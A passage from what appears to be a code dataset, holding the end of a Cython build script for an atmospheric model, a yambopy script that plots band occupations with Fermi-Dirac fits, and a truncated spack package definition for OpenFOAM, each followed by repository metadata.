runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Kinematics', ['Kinematics.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Lookup', ['Lookup.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('NetCDFIO', ['NetCDFIO.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Surface', ['Surface.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('SurfaceBudget', ['SurfaceBudget.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Damping', ['Damping.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Forcing', ['Forcing.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('entropies', ['entropies.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Radiation', ['Radiation.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs, extra_objects=extra_objects)
extensions.append(_ext)
_ext = Extension('AuxiliaryStatistics', ['AuxiliaryStatistics.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ConditionalStatistics', ['ConditionalStatistics.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Tracers', ['Tracers.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Restart', ['Restart.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('VisualizationOutput', ['VisualizationOutput.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
#Build RRTMG
rrtmg_compiled = os.path.exists('./RRTMG/rrtmg_build/rrtmg_combined.o')
if not rrtmg_compiled:
run_str = 'cd ./RRTMG; '
run_str += ('FC='+ f_compiler + ' LIB_NETCDF=' + netcdf_lib + ' INC_NETCDF='+
netcdf_include + ' csh ./compile_RRTMG_combined.csh')
print(run_str)
sp.call([run_str], shell=True)
else:
print("RRTMG Seems to be already compiled.")
setup(
ext_modules=cythonize(extensions, verbose=1, include_path=include_path)
)
| pressel/pycles | setup.py | Python | gpl-3.0 | 14,188 | [
"NetCDF"
] | 5ba63f45798cfe627dceaa4860a83f73edc167dd94713c91fdcfbb3a3b6f66bd |
# This script reads the carrier database
# and display it along a path in histogram form
# along with a representation of the carriers in energy space
from __future__ import print_function
from __future__ import division
from builtins import range
from past.utils import old_div
from yambopy import *
import matplotlib.gridspec as gridspec
from scipy.optimize import curve_fit
import os
############
# SETTINGS #
############
folder = 'rt-24x24'
calc = 'QSSIN-D-100.0fs-2.07eV-300K-DG' # Where RT carrier output is
path = [[0.0,0.0,0.0],[0.5,0.0,0.0],[0.33333,0.33333,0.0],[0.0,0.0,0.0]]
nbv = 2 ; nbc = 2 # nb of valence and conduction bands
########
# INIT #
########
# For saving pictures
os.system('mkdir -p occupations_v2/%s/%s'%(folder,calc))
# Instance containing bandstructure (as used in RT sim) and occupations
yrt = YamboRTDB(folder=folder,calc=calc)
yrt.get_path(path) # Generates kindex and distances
### aliases
times = [i * 1e15 for i in yrt.times] # carriers output times, in fs
nbands = yrt.nbands # number of bands in the RT simulation
if nbv+nbc != nbands:
raise NameError('Incompatible number of bands, set nbv and nbc in script.')
## 'path-plot' variables
kindex = yrt.bands_indexes # kpoint indexes (in order) to draw path
distances = yrt.bands_distances
eigenvalues = yrt.eigenvalues[kindex,:] # eigenvalues of the bands included in the RT simulation
#
max_occ = np.amax(yrt.occupations[:,kindex,:]) # used to size the distribution plots
occupations = old_div(yrt.occupations[:,kindex,:],max_occ) # format time,kindex,band index (from 0 to nbands, only on path)
#
##
## 'fit' variables and function
# FD distrib for fit
def fermi_dirac(E,a,T): # declare E first for fit
return old_div(1,(1+np.exp(old_div((E-a),T))))
#
KtoeV = 8.61733e-5
#
# xeng is an array of values to plot the fit properly
xeng = np.linspace(np.amin(eigenvalues[:,list(range(nbv))]), np.amax(eigenvalues[:,list(range(nbv,nbands))]),1000)
##
##############
# EXT. FIELD #
##############
# The external field is read from the o- file
ext = np.loadtxt('%s/%s/pulse/o-pulse.external_field'%(folder,calc))
field = old_div(ext[:,2],max(abs(ext[:,2]))) # polarization : x=1,y=2,z=3
##################
# ENERGY DISTRIB #
##################
# Sort the (n,k) pairs between positive and negative energies
# (If the same energy appears twice, it must not be summed over)
list_e=[] ; list_h=[]
for k in range(yrt.nkpoints):
for n in range(yrt.nbands):
e = yrt.eigenvalues[k,n]
if e<=0.0:
list_h.append((k,n))
else:
list_e.append((k,n))
# Map (k,n) to a single index for e and h
# then get the list of indices to sort the energies
nrj = np.zeros((len(list_e)))
for i,(k,n) in enumerate(list_e):
nrj[i]=yrt.eigenvalues[k,n]
sorted_e = np.argsort(nrj)
nrj = np.zeros((len(list_h)))
for i,(k,n) in enumerate(list_h):
nrj[i]=yrt.eigenvalues[k,n]
sorted_h = np.argsort(nrj)
# Build the occupation tables occ_x[t,(nk)_index,(e|occ)]
occ_e = np.zeros((len(times),len(list_e),2))
for t in range(len(times)):
for i,(k,n) in enumerate(list_e):
occ_e[t,i,0]=yrt.eigenvalues[k,n]
occ_e[t,i,1]=yrt.occupations[t,k,n]
occ_h = np.zeros((len(times),len(list_h),2))
for t in range(len(times)):
for i,(k,n) in enumerate(list_h):
occ_h[t,i,0]=yrt.eigenvalues[k,n]
occ_h[t,i,1]=yrt.occupations[t,k,n]
# Sorting
for t in range(len(times)):
occ_e[t,:,:]=occ_e[t,sorted_e,:]
occ_h[t,:,:]=occ_h[t,sorted_h,:]
# *(-1) on holes to fit the same way as electrons
occ_h *= -1
#################
# BAR PLOT DATA #
#################
# Fill arrays with occupation of valence and conduction bands
# Recall that 'occupations' was normalized
# one entry per band
occ_v = np.zeros((len(times),len(kindex),nbv))
occ_c = np.zeros((len(times),len(kindex),nbc))
for n in range(nbv):
occ_v[:,:,n] = -occupations[:,:,n] # minus sign to get positive occupations
for n in range(nbc):
occ_c[:,:,n] = occupations[:,:,n+nbv] # +nbv to read CBs
####################
# TIME LOOP & PLOT #
####################
# Gridspec allows to place subplots on a grid
# spacing for exemple can be customised
gs = gridspec.GridSpec(9, 8)
# y range for band structure & energy plots
ymin_v= np.amin(eigenvalues[:,:nbv])-0.1
ymin_c= np.amin(eigenvalues[:,nbv:])-0.1
ymax_v= np.amax(eigenvalues[:,:nbv])+0.1
ymax_c= np.amax(eigenvalues[:,nbv:])+0.1
###
for t in range(len(times)):
#for t in (30,):
i=t
print(times[i])
name = 'occupations_v2/'+folder+'/'+calc+'/%d.png' % (times[t])
fig = plt.figure()
fig.suptitle('Occupation of the bands and fit to the Fermi-Dirac distribution',fontsize=14,ha='center')
####### bandstructure w/ occupation plot
ax1c = plt.subplot(gs[0:4,0:-2])
ax1v = plt.subplot(gs[4:8,0:-2])
# remove x ticks
ax1c.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax1v.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
# set x range
ax1c.set_xlim((0,distances[-1]))
ax1v.set_xlim((0,distances[-1]))
# y range is defined with ax3 and ax4 (they share y axis with ax1)
# Plot band structure
ax1v.plot(distances,eigenvalues[:,:nbv],'k-',lw=2,zorder=0)
ax1c.plot(distances,eigenvalues[:,nbv:],'k-',lw=2,zorder=0)
# VB
for n in range(nbv):
ax1v.scatter(distances,eigenvalues[:,n],s=400*occ_v[t,:,n],color='blue',alpha=0.5)
# CB
for n in range(nbc):
ax1c.scatter(distances,eigenvalues[:,nbv+n],s=400*occ_c[t,:,n],color='red',alpha=0.5)
# text and labels
fig.text(0.05,0.6,'Energy (eV)',size=16,rotation='vertical')
fig.text(0.50,0.91, '%d fs'%times[t],size=16)
######## field plot
ax2 = plt.subplot(gs[-1,:])
# remove ticks and labels
ax2.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax2.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')
# text
ax2.set_ylabel('Field')
# frame size
ax2.set_xlim((0,times[-1]))
ax2.set_ylim((-1.3,1.3))
ax2.plot(field[:int(times[t])])
## Plot of the occupation as a function of energy (rotated to match the band structure)
ax3 = plt.subplot(gs[0:4,-2:],sharey=ax1c)
ax4 = plt.subplot(gs[4:8,-2:],sharey=ax1v)
# plot the data
try: # does not break if fit is not found
fit,cov = curve_fit(fermi_dirac,occ_e[i,:,0],occ_e[i,:,1])
except RuntimeError:
fit=np.array([0,0])
ax3.fill_betweenx(occ_e[i,:,0],0,occ_e[i,:,1],color='red')
ax3.plot(fermi_dirac(xeng,fit[0],fit[1]),xeng,'k-')
ax3.text(0.5,0.9,'Electrons\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax3.transAxes,ha='center',va='center')
try:
fit,cov = curve_fit(fermi_dirac,occ_h[i,:,0],occ_h[i,:,1])
except RuntimeError:
fit=np.array([0,0])
ax4.fill_betweenx(-occ_h[i,:,0],0,occ_h[i,:,1],color='blue')
ax4.plot(fermi_dirac(xeng,fit[0],fit[1]),-xeng,'k-')
ax4.text(0.5,0.1,'Holes\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax4.transAxes,ha='center',va='center')
# set x and y range
ax4.set_xlim(-0.1*max_occ,1.1*max_occ)
ax3.set_xlim(-0.1*max_occ,1.1*max_occ)
ax3.set_ylim(( ymin_c,ymax_c ))
ax4.set_ylim(( ymin_v,ymax_v ))
# hide some ticks/labels
ax3.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax3.tick_params(axis='y',labelleft='off',labelright='off')
ax4.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax4.tick_params(axis='y',labelleft='off',labelright='off')
plt.savefig( name ,transparent=False,dpi=300)
print(name)
#plt.show()
plt.close(fig)
| henriquemiranda/yambo-py | scripts/realtime/plot_occ2.py | Python | bsd-3-clause | 7,697 | [
"DIRAC"
] | b67e3f6b1be8891b7b9f8e8fa70d303b240a2e69341affc813b3ede175ca6716 |
##############################################################################
# Copyright (c) 2017-2018 Mark Olesen, OpenCFD Ltd.
#
# This file was authored by Mark Olesen <mark.olesen@esi-group.com>
# and is released as part of spack under the LGPL license.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for the LLNL notice and LGPL.
#
# License
# -------
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Legal Notice
# ------------
# OPENFOAM is a trademark owned by OpenCFD Ltd
# (producer and distributor of the OpenFOAM software via www.openfoam.com).
# The trademark information must remain visible and unadulterated in this
# file and via the "spack info" and comply with the term set by
# http://openfoam.com/legal/trademark-policy.php
#
# This file is not part of OpenFOAM, nor does it constitute a component of an
# OpenFOAM distribution.
#
##############################################################################
#
# Notes
# - mpi handling: WM_MPLIB=USERMPI and use spack to populate an appropriate
# configuration and generate wmake rules for 'USER' and 'USERMPI'
# mpi implementations.
#
# - Resolution of flex, zlib needs more attention (within OpenFOAM)
# - +paraview:
# depends_on should just be 'paraview+plugins' but that resolves poorly.
# Workaround: use preferred variants "+plugins +qt"
# packages:
# paraview:
# variants: +plugins +qt
# in ~/.spack/packages.yaml
#
# Known issues
# - Combining +zoltan with +int64 has not been tested, but probably won't work.
# - Combining +mgridgen with +int64 or +float32 probably won't work.
#
# The spack 'develop' version of openfoam-com retains the upstream
# WM_PROJECT_VERSION=plus naming internally.
#
##############################################################################
import glob
import re
import shutil
import os
from spack import *
from spack.environment import EnvironmentModifications
import llnl.util.tty as tty
# Not the nice way of doing things, but is a start for refactoring
__all__ = [
'add_extra_files',
'write_environ',
'rewrite_environ_files',
'mplib_content',
'foamAddPath',
'foamAddLib',
'OpenfoamArch',
]
def add_extra_files(foam_pkg, common, local, **kwargs):
"""Copy additional common and local files into the stage.source_path
from the openfoam-com/common and the package/assets directories,
respectively
"""
outdir = foam_pkg.stage.source_path
indir = join_path(os.path.dirname(__file__), 'common')
for f in common:
tty.info('Added file {0}'.format(f))
install(join_path(indir, f), join_path(outdir, f))
indir = join_path(foam_pkg.package_dir, 'assets')
for f in local:
tty.info('Added file {0}'.format(f))
install(join_path(indir, f), join_path(outdir, f))
def format_export(key, value):
"""Format key,value pair as 'export' with newline for POSIX shell.
A leading '#' for key adds a comment character to the entire line.
A value of 'None' corresponds to 'unset'.
"""
if key.startswith('#'):
return '## export {0}={1}\n'.format(re.sub(r'^#+\s*', '', key), value)
elif value is None:
return 'unset {0}\n'.format(key)
else:
return 'export {0}={1}\n'.format(key, value)
def format_setenv(key, value):
"""Format key,value pair as 'setenv' with newline for C-shell.
A leading '#' for key adds a comment character to the entire line.
A value of 'None' corresponds to 'unsetenv'.
"""
if key.startswith('#'):
return '## setenv {0} {1}\n'.format(re.sub(r'^#+\s*', '', key), value)
elif value is None:
return 'unsetenv {0}\n'.format(key)
else:
return 'setenv {0} {1}\n'.format(key, value)
def _write_environ_entries(outfile, environ, formatter):
"""Write environment settings as 'export' or 'setenv'.
If environ is a dict, write in sorted order.
If environ is a list, write pair-wise.
Also descends into sub-dict and sub-list, but drops the key.
"""
if isinstance(environ, dict):
for key in sorted(environ):
entry = environ[key]
if isinstance(entry, dict):
_write_environ_entries(outfile, entry, formatter)
elif isinstance(entry, list):
_write_environ_entries(outfile, entry, formatter)
else:
outfile.write(formatter(key, entry))
elif isinstance(environ, list):
for item in environ:
outfile.write(formatter(item[0], item[1]))
def _write_environ_file(output, environ, formatter):
"""Write environment settings as 'export' or 'setenv'.
If environ is a dict, write in sorted order.
If environ is a list, write pair-wise.
Also descends into sub-dict and sub-list, but drops the key.
"""
with open(output, 'w') as outfile:
outfile.write('# spack generated\n')
_write_environ_entries(outfile, environ, formatter)
outfile.write('# spack\n')
def write_environ(environ, **kwargs):
"""Write environment settings as 'export' or 'setenv'.
If environ is a dict, write in sorted order.
If environ is a list, write pair-wise.
Keyword Options:
posix[=None] If set, the name of the POSIX file to rewrite.
cshell[=None] If set, the name of the C-shell file to rewrite.
"""
rcfile = kwargs.get('posix', None)
if rcfile:
_write_environ_file(rcfile, environ, format_export)
rcfile = kwargs.get('cshell', None)
if rcfile:
_write_environ_file(rcfile, environ, format_setenv)
def rewrite_environ_files(environ, **kwargs):
"""Use filter_file to rewrite (existing) POSIX shell or C-shell files.
Keyword Options:
posix[=None] If set, the name of the POSIX file to rewrite.
cshell[=None] If set, the name of the C-shell file to rewrite.
"""
rcfile = kwargs.get('posix', None)
if rcfile and os.path.isfile(rcfile):
for k, v in environ.items():
regex = r'^(\s*export\s+{0})=.*$'.format(k)
if not v:
replace = r'unset {0} #SPACK: unset'.format(k)
elif v.startswith('#'):
replace = r'unset {0} {1}'.format(k, v)
else:
replace = r'\1={0}'.format(v)
filter_file(regex, replace, rcfile, backup=False)
rcfile = kwargs.get('cshell', None)
if rcfile and os.path.isfile(rcfile):
for k, v in environ.items():
regex = r'^(\s*setenv\s+{0})\s+.*$'.format(k)
if not v:
replace = r'unsetenv {0} #SPACK: unset'.format(k)
elif v.startswith('#'):
replace = r'unsetenv {0} {1}'.format(k, v)
else:
replace = r'\1 {0}'.format(v)
filter_file(regex, replace, rcfile, backup=False)
def foamAddPath(*args):
"""A string with args prepended to 'PATH'"""
return '"' + ':'.join(args) + ':${PATH}"'
def foamAddLib(*args):
"""A string with args prepended to 'LD_LIBRARY_PATH'"""
return '"' + ':'.join(args) + ':${LD_LIBRARY_PATH}"'
def pkglib(package, pre=None):
"""Get lib64 or lib from package prefix.
Optional parameter 'pre' to provide alternative prefix
"""
libdir = package.prefix.lib64
if not os.path.isdir(libdir):
libdir = package.prefix.lib
if pre:
return join_path(pre, os.path.basename(libdir))
else:
return libdir
def mplib_content(spec, pre=None):
"""The mpi settings (from spack) for the OpenFOAM wmake includes, which
allows later reuse within OpenFOAM.
Optional parameter 'pre' to provide alternative prefix
"""
mpi_spec = spec['mpi']
bin = mpi_spec.prefix.bin
inc = mpi_spec.prefix.include
lib = pkglib(mpi_spec)
libname = 'mpi'
if 'mpich' in mpi_spec.name:
libname = 'mpich'
if pre:
bin = join_path(pre, os.path.basename(bin))
inc = join_path(pre, os.path.basename(inc))
lib = join_path(pre, os.path.basename(lib))
else:
pre = mpi_spec.prefix
info = {
'name': '{0}-{1}'.format(mpi_spec.name, mpi_spec.version),
'prefix': pre,
'include': inc,
'bindir': bin,
'libdir': lib,
'FLAGS': '-DOMPI_SKIP_MPICXX -DMPICH_SKIP_MPICXX',
'PINC': '-I{0}'.format(inc),
'PLIBS': '-L{0} -l{1}'.format(lib, libname),
}
return info
# -----------------------------------------------------------------------------
class OpenfoamCom(Package):
"""OpenFOAM is a GPL-opensource C++ CFD-toolbox.
This offering is supported by OpenCFD Ltd,
producer and distributor of the OpenFOAM software via www.openfoam.com,
and owner of the OPENFOAM trademark.
OpenCFD Ltd has been developing and releasing OpenFOAM since its debut
in 2004.
"""
maintainers = ['olesenm']
homepage = "http://www.openfoam.com/"
gitrepo = "https://develop.openfoam.com/Development/OpenFOAM-plus.git"
url = "https://sourceforge.net/projects/openfoamplus/files/v1706/OpenFOAM-v1706.tgz"
list_url = "https://sourceforge.net/projects/openfoamplus/files/"
list_depth = 2
version('1806', 'bb244a3bde7048a03edfccffc46c763f')
version('1712', '6ad92df051f4d52c7d0ec34f4b8eb3bc')
version('1706', '630d30770f7b54d6809efbf94b7d7c8f')
version('1612', 'ca02c491369150ab127cbb88ec60fbdf')
version('develop', branch='develop', git=gitrepo, submodules='True') # Needs credentials
variant('float32', default=False,
description='Use single-precision')
variant('int64', default=False,
description='With 64-bit labels')
variant('knl', default=False,
description='Use KNL compiler settings')
variant('kahip', default=True,
description='With kahip decomposition')
variant('metis', default=False,
description='With metis decomposition')
variant('scotch', default=True,
description='With scotch/ptscotch decomposition')
variant('zoltan', default=False,
description='With zoltan renumbering')
# TODO?# variant('scalasca', default=False,
# TODO?# description='With scalasca profiling')
variant('mgridgen', default=False, description='With mgridgen support')
variant('paraview', default=False,
description='Build paraview plugins and runtime post-processing')
variant('vtk', default=False,
description='With VTK runTimePostProcessing')
variant('source', default=True,
description='Install library/application sources and tutorials')
provides('openfoam')
depends_on('mpi')
# After 1712, could suggest openmpi+thread_multiple for collated output
# but particular mixes of mpi versions and InfiniBand may not work so well
# conflicts('^openmpi~thread_multiple', when='@1712:')
depends_on('zlib')
depends_on('fftw')
depends_on('boost')
depends_on('cgal')
# The flex restriction is ONLY to deal with a spec resolution clash
# introduced by the restriction within scotch!
depends_on('flex@:2.6.1,2.6.4:', type='build')
depends_on('cmake', type='build')
# Require scotch with ptscotch - corresponds to standard OpenFOAM setup
depends_on('scotch~metis+mpi~int64', when='+scotch~int64')
depends_on('scotch~metis+mpi+int64', when='+scotch+int64')
depends_on('kahip', when='+kahip')
depends_on('metis@5:', when='+metis')
depends_on('metis+int64', when='+metis+int64')
# mgridgen is statically linked
depends_on('parmgridgen', when='+mgridgen', type='build')
depends_on('zoltan', when='+zoltan')
depends_on('vtk', when='+vtk')
# TODO?# depends_on('scalasca', when='+scalasca')
# For OpenFOAM plugins and run-time post-processing this should just be
# 'paraview+plugins' but that resolves poorly.
# Workaround: use preferred variants "+plugins +qt" in
# ~/.spack/packages.yaml
# 1706 ok with newer paraview but avoid pv-5.2, pv-5.3 readers
depends_on('paraview@5.4:', when='@1706:+paraview')
# 1612 plugins need older paraview
depends_on('paraview@:5.0.1', when='@1612+paraview')
# General patches
common = ['spack-Allwmake', 'README-spack']
assets = []
# Version-specific patches
patch('1612-spack-patches.patch', when='@1612')
# Some user config settings
# default: 'compile-option': 'RpathOpt',
# default: 'mplib': 'USERMPI', # Use user mpi for spack
config = {
# Add links into bin/, lib/ (eg, for other applications)
'link': False
}
# The openfoam architecture, compiler information etc
_foam_arch = None
# Content for etc/prefs.{csh,sh}
etc_prefs = {}
# Content for etc/config.{csh,sh}/ files
etc_config = {}
phases = ['configure', 'build', 'install']
build_script = './spack-Allwmake' # From patch() method.
#
# - End of definitions / setup -
#
def url_for_version(self, version):
# Prior to 'v1706' and additional '+' in the naming
fmt = self.list_url
if version <= Version('1612'):
fmt += 'v{0}+/OpenFOAM-v{0}+.tgz'
else:
fmt += 'v{0}/OpenFOAM-v{0}.tgz'
return fmt.format(version, version)
def setup_environment(self, spack_env, run_env):
"""Add environment variables to the generated module file.
These environment variables come from running:
.. code-block:: console
$ . $WM_PROJECT_DIR/etc/bashrc
"""
# NOTE: Spack runs setup_environment twice.
# 1) pre-build to set up the build environment
# 2) post-install to determine runtime environment variables
# The etc/bashrc is only available (with corrrect content)
# post-installation.
bashrc = join_path(self.projectdir, 'etc', 'bashrc')
minimal = True
if os.path.isfile(bashrc):
# post-install: source the installed bashrc
try:
mods = EnvironmentModifications.from_sourcing_file(
bashrc,
clean=True, # Remove duplicate entries
blacklist=[ # Blacklist these
# Inadvertent changes
# -------------------
'PS1', # Leave unaffected
'MANPATH', # Leave unaffected
# Unneeded bits
# -------------
'FOAM_SETTINGS', # Do not use with modules
'FOAM_INST_DIR', # Old
'FOAM_(APP|ETC|SRC|SOLVERS|UTILITIES)',
# 'FOAM_TUTORIALS', # can be useful
'WM_OSTYPE', # Purely optional value
# Third-party cruft - only used for orig compilation
# -----------------
'[A-Z].*_ARCH_PATH',
'(KAHIP|METIS|SCOTCH)_VERSION',
# User-specific
# -------------
'FOAM_RUN',
'(FOAM|WM)_.*USER_.*',
],
whitelist=[ # Whitelist these
'MPI_ARCH_PATH', # Can be needed for compilation
])
run_env.extend(mods)
minimal = False
tty.info('OpenFOAM bashrc env: {0}'.format(bashrc))
except Exception:
minimal = True
if minimal:
# pre-build or minimal environment
tty.info('OpenFOAM minimal env {0}'.format(self.prefix))
run_env.set('FOAM_PROJECT_DIR', self.projectdir)
run_env.set('WM_PROJECT_DIR', self.projectdir)
for d in ['wmake', self.archbin]: # bin added automatically
run_env.prepend_path('PATH', join_path(self.projectdir, d))
def setup_dependent_environment(self, spack_env, run_env, dependent_spec):
"""Location of the OpenFOAM project directory.
This is identical to the WM_PROJECT_DIR value, but we avoid that
variable since it would mask the normal OpenFOAM cleanup of
previous versions.
"""
spack_env.set('FOAM_PROJECT_DIR', self.projectdir)
@property
def projectdir(self):
"""Absolute location of project directory: WM_PROJECT_DIR/"""
return self.prefix # <- install directly under prefix
@property
def foam_arch(self):
if not self._foam_arch:
self._foam_arch = OpenfoamArch(self.spec, **self.config)
return self._foam_arch
@property
def archbin(self):
"""Relative location of architecture-specific executables"""
return join_path('platforms', self.foam_arch, 'bin')
@property
def archlib(self):
"""Relative location of architecture-specific libraries"""
return join_path('platforms', self.foam_arch, 'lib')
def patch(self):
"""Adjust OpenFOAM build for spack.
Where needed, apply filter as an alternative to normal patching."""
add_extra_files(self, self.common, self.assets)
# Avoid WM_PROJECT_INST_DIR for ThirdParty, site or jobControl.
#
# Filtering: bashrc,cshrc (using a patch is less flexible)
edits = {
'WM_THIRD_PARTY_DIR':
r'$WM_PROJECT_DIR/ThirdParty #SPACK: No separate third-party',
}
rewrite_environ_files( # etc/{bashrc,cshrc}
edits,
posix=join_path('etc', 'bashrc'),
cshell=join_path('etc', 'cshrc'))
# Filtering: settings
edits = {
'FOAM_EXT_LIBBIN': '#SPACK: No separate third-party', # ie, unset
}
rewrite_environ_files( # etc/config.{csh,sh}/settings
edits,
posix=join_path('etc', 'config.sh', 'settings'),
cshell=join_path('etc', 'config.csh', 'settings'))
# The following filtering is non-vital. It simply prevents 'site' dirs
# from the the wrong level (likely non-existent anyhow) from being
# added to PATH, LD_LIBRARY_PATH.
for rcdir in ['config.sh', 'config.csh']:
rcfile = join_path('etc', rcdir, 'settings')
if os.path.isfile(rcfile):
filter_file(
'WM_PROJECT_INST_DIR/',
'WM_PROJECT_DIR/',
rcfile,
backup=False)
def configure(self, spec, prefix):
"""Make adjustments to the OpenFOAM configuration files in their various
locations: etc/bashrc, etc/config.sh/FEATURE and customizations that
don't properly fit get placed in the etc/prefs.sh file (similiarly for
csh).
"""
# Filtering bashrc, cshrc
edits = {}
edits.update(self.foam_arch.foam_dict())
rewrite_environ_files( # etc/{bashrc,cshrc}
edits,
posix=join_path('etc', 'bashrc'),
cshell=join_path('etc', 'cshrc'))
# Content for etc/prefs.{csh,sh}
self.etc_prefs = {
# TODO
# 'CMAKE_ARCH_PATH': spec['cmake'].prefix,
# 'FLEX_ARCH_PATH': spec['flex'].prefix,
# 'ZLIB_ARCH_PATH': spec['zlib'].prefix,
}
# MPI content, using MPI_ARCH_PATH
user_mpi = mplib_content(spec, '${MPI_ARCH_PATH}')
# Content for etc/config.{csh,sh}/ files
self.etc_config = {
'CGAL': [
('BOOST_ARCH_PATH', spec['boost'].prefix),
('CGAL_ARCH_PATH', spec['cgal'].prefix),
('LD_LIBRARY_PATH',
foamAddLib(
pkglib(spec['boost'], '${BOOST_ARCH_PATH}'),
pkglib(spec['cgal'], '${CGAL_ARCH_PATH}'))),
],
'FFTW': [
('FFTW_ARCH_PATH', spec['fftw'].prefix), # Absolute
('LD_LIBRARY_PATH',
foamAddLib(
pkglib(spec['fftw'], '${BOOST_ARCH_PATH}'))),
],
# User-defined MPI
'mpi-user': [
('MPI_ARCH_PATH', spec['mpi'].prefix), # Absolute
('LD_LIBRARY_PATH', foamAddLib(user_mpi['libdir'])),
('PATH', foamAddPath(user_mpi['bindir'])),
],
'scotch': {},
'kahip': {},
'metis': {},
'ensight': {}, # Disable settings
'paraview': [],
'gperftools': [], # Currently unused
'vtk': [],
}
if '+scotch' in spec:
self.etc_config['scotch'] = {
'SCOTCH_ARCH_PATH': spec['scotch'].prefix,
# For src/parallel/decompose/Allwmake
'SCOTCH_VERSION': 'scotch-{0}'.format(spec['scotch'].version),
}
if '+kahip' in spec:
self.etc_config['kahip'] = {
'KAHIP_ARCH_PATH': spec['kahip'].prefix,
}
if '+metis' in spec:
self.etc_config['metis'] = {
'METIS_ARCH_PATH': spec['metis'].prefix,
}
if '+paraview' in spec:
pvMajor = 'paraview-{0}'.format(spec['paraview'].version.up_to(2))
self.etc_config['paraview'] = [
('ParaView_DIR', spec['paraview'].prefix),
('ParaView_INCLUDE_DIR', '${ParaView_DIR}/include/' + pvMajor),
('PV_PLUGIN_PATH', '$FOAM_LIBBIN/' + pvMajor),
('PATH', foamAddPath('${ParaView_DIR}/bin')),
]
if '+vtk' in spec:
self.etc_config['vtk'] = [
('VTK_DIR', spec['vtk'].prefix),
('LD_LIBRARY_PATH',
foamAddLib(pkglib(spec['vtk'], '${VTK_DIR}'))),
]
# Optional
if '+mgridgen' in spec:
self.etc_config['mgridgen'] = {
'MGRIDGEN_ARCH_PATH': spec['parmgridgen'].prefix
}
# Optional
if '+zoltan' in spec:
self.etc_config['zoltan'] = {
'ZOLTAN_ARCH_PATH': spec['zoltan'].prefix
}
# Write prefs files according to the configuration.
# Only need prefs.sh for building, but install both for end-users
if self.etc_prefs:
write_environ(
self.etc_prefs,
posix=join_path('etc', 'prefs.sh'),
cshell=join_path('etc', 'prefs.csh'))
# Adjust components to use SPACK variants
for component, subdict in self.etc_config.items():
write_environ(
subdict,
posix=join_path('etc', 'config.sh', component),
cshell=join_path('etc', 'config.csh', component))
def build(self, spec, prefix):
"""Build using the OpenFOAM Allwmake script, with a wrapper to source
its environment first.
Only build if the compiler is known to be supported.
"""
self.foam_arch.has_rule(self.stage.source_path)
self.foam_arch.create_rules(self.stage.source_path, self)
args = ['-silent']
if self.parallel: # Build in parallel? - pass as an argument
args.append('-j{0}'.format(make_jobs))
builder = Executable(self.build_script)
builder(*args)
def install(self, spec, prefix):
"""Install under the projectdir"""
mkdirp(self.projectdir)
projdir = os.path.basename(self.projectdir)
# Filtering: bashrc, cshrc
edits = {
'WM_PROJECT_INST_DIR': os.path.dirname(self.projectdir),
'WM_PROJECT_DIR': join_path('$WM_PROJECT_INST_DIR', projdir),
}
# All top-level files, except spack build info and possibly Allwmake
if '+source' in spec:
ignored = re.compile(r'^spack-.*')
else:
